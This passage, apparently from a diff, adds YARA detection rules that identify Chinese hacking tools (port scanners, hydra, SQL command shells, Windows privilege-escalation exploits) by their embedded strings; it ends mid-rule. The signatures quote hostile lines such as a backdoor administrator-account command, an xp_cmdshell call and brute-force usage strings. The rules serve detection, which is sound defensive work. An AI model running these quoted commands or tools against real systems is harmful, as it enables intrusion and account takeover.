+      $s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
+      $s7 = "[-] There is a error...Create a new connection." fullword ascii
+      $s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+      $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+      $s13 = "[+] Make a Connection to %s:%d...." fullword ascii
+      $s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+      $s17 = "[+] Waiting another Client on port:%d...." fullword ascii
+      $s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+
+rule x_way2_5_X_way_RID2C66 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file X-way.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:47:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "TTFTPSERVERFRM" fullword wide
+      $s1 = "TPORTSCANSETFRM" fullword wide
+      $s2 = "TIISSHELLFRM" fullword wide
+      $s3 = "TADVSCANSETFRM" fullword wide
+      $s4 = "ntwdblib.dll" fullword ascii
+      $s5 = "TSNIFFERFRM" fullword wide
+      $s6 = "TCRACKSETFRM" fullword wide
+      $s7 = "TCRACKFRM" fullword wide
+      $s8 = "dbnextrow" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+}
+
+rule tools_Sqlcmd_RID2C05 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Sqlcmd.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:31:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
+      $s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii
+      $s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
+      $s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
+      $s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
+      $s10 = "Error,exit!" fullword ascii
+      $s11 = "Sqlcmd>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and 3 of them
+}
+
+rule Dos_c_RID28F9 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file c.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 19:33:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "!Win32 .EXE." fullword ascii
+      $s1 = ".MPRESS1" fullword ascii
+      $s2 = ".MPRESS2" fullword ascii
+      $s3 = "XOLEHLP.dll" fullword ascii
+      $s4 = "</body></html>" fullword ascii
+      $s8 = "DtcGetTransactionManagerExA" fullword ascii
+      $s9 = "GetUserNameA" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule arpsniffer_RID2B41 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file arpsniffer_RID2B41.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:58:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SHELL" ascii
+      $s2 = "PacketSendPacket" fullword ascii
+      $s3 = "ArpSniff" ascii
+      $s4 = "pcap_loop" fullword ascii
+      $s5 = "packet.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 120KB and all of them
+}
+
+rule pw_inspector_2_RID2CBF : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file pw-inspector.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:02:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+      $s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
+      $s3 = "PW-Inspector" fullword ascii
+      $s4 = "i:o:m:M:c:lunps" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+
+rule datPcShare_RID2AF0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file datPcShare_RID2AF0.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:31:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "PcShare.EXE" fullword wide
+      $s2 = "MZKERNEL32.DLL" fullword ascii
+      $s3 = "PcShare" fullword wide
+      $s4 = "QQ:4564405" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them
+}
+
+rule Tools_xport_RID2BBE : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file xport.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:19:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
+      $s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
+      $s3 = "%s - command line port scanner" fullword ascii
+      $s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
+      $s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
+      $s6 = ".\\port.ini" fullword ascii
+      $s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
+      $s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+      $s9 = "http://www.xfocus.org" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+
+rule Radmin_Hash_RID2B4F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Radmin_Hash_RID2B4F.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:01:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<description>IEBars</description>" fullword ascii
+      $s2 = "PECompact2" fullword ascii
+      $s3 = "Radmin, Remote Administrator" fullword wide
+      $s4 = "Radmin 3.0 Hash " fullword wide
+      $s5 = "HASH1.0" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule OSEditor_RID2A1A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file OSEditor_RID2A1A.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 03:35:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "OSEditor_RID2A1A.exe" fullword wide
+      $s2 = "netsafe" wide
+      $s3 = "OSC Editor" fullword wide
+      $s4 = "GIF89" ascii
+      $s5 = "Unlock" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule GoodToolset_ms11011_RID2DB7 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ms11011.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:43:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\i386\\Hello.pdb" ascii
+      $s1 = "OS not supported." fullword ascii
+      $s3 = "Not supported." fullword wide
+      $s4 = "SystemDefaultEUDCFont" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule FreeVersion_release_RID2EB9 : CHINA DEMO EXE FILE HKTL T1087 T1136 {
+   meta:
+      description = "Chinese Hacktool Set - file release.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:26:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1087, T1136"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-->Got WMI process Pid: %d " ascii
+      $s2 = "This exploit will execute \"net user " ascii
+      $s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
+      $s4 = "Running reverse shell" ascii
+      $s5 = "wmiprvse.exe" fullword ascii
+      $s6 = "SELECT * FROM IIsWebInfo" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+}
+
+rule churrasco_RID2ADB : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file churrasco_RID2ADB.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:56:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Done, command should have ran as SYSTEM!" ascii
+      $s2 = "Running command with SYSTEM Token..." ascii
+      $s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
+      $s4 = "Found SYSTEM token 0x%x" ascii
+      $s5 = "Thread not impersonating, looking for another thread..." ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+}
+
+rule x64_KiwiCmd_RID2AFA : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file KiwiCmd.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:46:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+      $s2 = "Kiwi Cmd no-gpo" fullword wide
+      $s3 = "KiwiAndCMD" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+}
+
+rule sql1433_SQL_RID2A7B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file SQL.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:16:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 } 
+      $s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 90KB and all of them
+}
+
+rule xscan_gui_RID2AD2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file xscan_gui_RID2AD2.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:41:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
+      $s2 = "www.target.com" fullword ascii
+      $s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
+      $s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule CN_Tools_hscan_RID2C7E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hscan.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:51:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
+      $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
+      $s3 = "%s -h www.target.com -all" fullword ascii
+      $s4 = ".\\report\\%s-%s.html" fullword ascii
+      $s5 = ".\\log\\Hscan.log" fullword ascii
+      $s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+      $s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
+      $s8 = ".\\conf\\mysql_pass.dic" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule GoodToolset_pr_RID2CC5 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file pr.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:03:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-->Got WMI process Pid: %d " ascii
+      $s2 = "-->This exploit gives you a Local System shell " ascii
+      $s3 = "wmiprvse.exe" fullword ascii
+      $s4 = "Try the first %d time" fullword ascii
+      $s5 = "-->Build&&Change By p " ascii
+      $s6 = "root\\MicrosoftIISv2" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule hydra_7_4_1_hydra_RID2D59 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hydra.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:28:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
+      $s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+      $s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+      $s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
+      $s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
+      $s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule CN_Tools_srss_2_RID2CCD : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file srss.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:04:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "used pepack!" fullword ascii
+      $s1 = "KERNEL32.dll" fullword ascii
+      $s2 = "KERNEL32.DLL" fullword ascii
+      $s3 = "LoadLibraryA" fullword ascii
+      $s4 = "GetProcAddress" fullword ascii
+      $s5 = "VirtualProtect" fullword ascii
+      $s6 = "VirtualAlloc" fullword ascii
+      $s7 = "VirtualFree" fullword ascii
+      $s8 = "ExitProcess" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ( $s* )
+}
+
+rule Dos_NtGod_RID2A72 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file NtGod.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:01:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\temp\\NtGodMode.exe" ascii
+      $s4 = "NtGodMode.exe" fullword ascii
+      $s10 = "ntgod.bat" fullword ascii
+      $s19 = "sfxcmd" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule tools_NTCmd_RID2B57 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file NTCmd.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:02:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
+      $s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii
+      $s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
+      $s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii
+      $s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
+      $s6 = "NTcmd>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 2 of them
+}
+
+rule mysql_pwd_crack_RID2D54 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file mysql_pwd_crack_RID2D54.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:27:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mysql_pwd_crack_RID2D54 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
+      $s2 = "Successfully --> username %s password %s " fullword ascii
+      $s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
+      $s4 = "-a automode  automatic crack the mysql password " fullword ascii
+      $s5 = "mysql_pwd_crack_RID2D54 127.0.0.1 -x 3306 -a" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule CmdShell64_RID2A87 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file CmdShell64_RID2A87.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:36:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
+      $s2 = "ServiceCmdShell" fullword ascii
+      $s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
+      $s4 = "ServiceSystemShell" fullword wide
+      $s5 = "[Root@CmdShell ~]#" fullword wide
+      $s6 = "Hello Man 2015 !" fullword wide
+      $s7 = "CmdShell" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 4 of them
+}
+
+rule Ms_Viru_v_RID2AAB : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file v.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 07:36:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
+      $s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
+      $s3 = "OH,Sry.Too long command." fullword ascii
+      $s4 = "Success! Commander." fullword ascii
+      $s5 = "Hey,how can racle work without ur command ?" fullword ascii
+      $s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+}
+
+rule CN_Tools_Vscan_RID2C6C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Vscan.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:48:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
+      $s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
+      $s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
+      $s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
+      $s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and 2 of them
+}
+
+rule Dos_iis_RID29DB : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file iis.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 01:50:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "comspec" fullword ascii
+      $s2 = "program terming" fullword ascii
+      $s3 = "WinSta0\\Defau" fullword ascii
+      $s4 = "* FROM IIsWebInfo" ascii
+      $s5 = "www.icehack." ascii
+      $s6 = "wmiprvse.exe" fullword ascii
+      $s7 = "Pid: %d" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 70KB and all of them
+}
+
+rule Pc_rejoice_RID2B04 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file rejoice.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:48:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
+      $s2 = "http://www.xxx.com/xxx.exe" fullword ascii
+      $s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
+      $s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+      $s5 = "ListViewProcessListColumnClick!" fullword ascii
+      $s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them
+}
+
+rule ms11080_withcmd_RID2C3A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ms11080_withcmd_RID2C3A.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:40:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+      $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii
+      $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+      $s4 = "[>] create porcess error" fullword ascii
+      $s5 = "[>] ms11-080 Exploit" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+}
+
+rule OtherTools_xiaoa_RID2D95 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file xiaoa.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:38:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+      $s2 = "The shell \"cmd\" success!" fullword ascii
+      $s3 = "Not Windows NT family OS." fullword ascii
+      $s4 = "Unable to get kernel base address." fullword ascii
+      $s5 = "run \"%s\" failed,code: %d" fullword ascii
+      $s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+
+rule hydra_7_3_hydra_RID2CC8 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hydra.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:03:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
+      $s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
+      $s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
+      $s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+      $s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+}
+
+rule SQLTools_RID2A12 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file SQLTools_RID2A12.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 03:21:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "DBN_POST" fullword wide
+      $s2 = "LOADER ERROR" fullword ascii
+      $s3 = "www.1285.net" fullword wide
+      $s4 = "TUPFILEFORM" fullword wide
+      $s5 = "DBN_DELETE" fullword wide
+      $s6 = "DBINSERT" fullword wide
+      $s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2350KB and all of them
+}
+
+rule portscanner_RID2BC0 : CHINA DEMO EXE FILE HKTL {
+   meta:
